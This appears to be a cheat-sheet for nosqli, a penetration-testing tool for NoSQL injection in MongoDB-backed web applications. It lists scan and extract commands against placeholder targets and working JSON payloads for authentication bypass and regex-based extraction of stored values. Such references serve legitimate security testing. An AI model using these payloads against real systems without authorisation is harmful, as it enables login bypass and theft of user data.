Description
nosqli is a command-line tool for detecting and exploiting NoSQL injection vulnerabilities, primarily targeting MongoDB. It automates detection of authentication bypass, data exfiltration, and boolean/timing-based injection in web applications.
Installation
BASH
go install github.com/Charlie-belmer/nosqli@latestBasic Usage
BASH
# Test a URL for NoSQL injection
nosqli scan -t "https://target.com/login" -p "username,password"
# Automatic detection
nosqli scan -t "https://target.com/api/users?id=1"Advanced Usage
BASH
# POST request testing
nosqli scan -t "https://target.com/login" -m POST \
-d '{"username":"admin","password":"test"}' \
-H "Content-Type: application/json"
# Extract data
nosqli extract -t "https://target.com/api/users?id=1" -p "id"
# Custom proxy (through Burp)
nosqli scan -t "https://target.com/login" --proxy http://127.0.0.1:8080
# Verbose output
nosqli scan -t "https://target.com/login" -vCommon Payloads
JSON
// Authentication bypass
{"username": {"$ne": ""}, "password": {"$ne": ""}}
{"username": "admin", "password": {"$gt": ""}}
{"username": {"$regex": "^admin"}, "password": {"$ne": ""}}
// Data extraction
{"username": {"$regex": "^a"}, "password": {"$ne": ""}}
// Iterate: ^a, ^ab, ^abc... to extract full valuesCommon Workflows
BASH
# Test login form for NoSQL bypass
nosqli scan -t "https://target.com/api/login" -m POST \
-d '{"email":"test@test.com","password":"test"}' \
-H "Content-Type: application/json"
# Combine with manual testing
# If nosqli confirms injection, manually extract data via regex-based exfil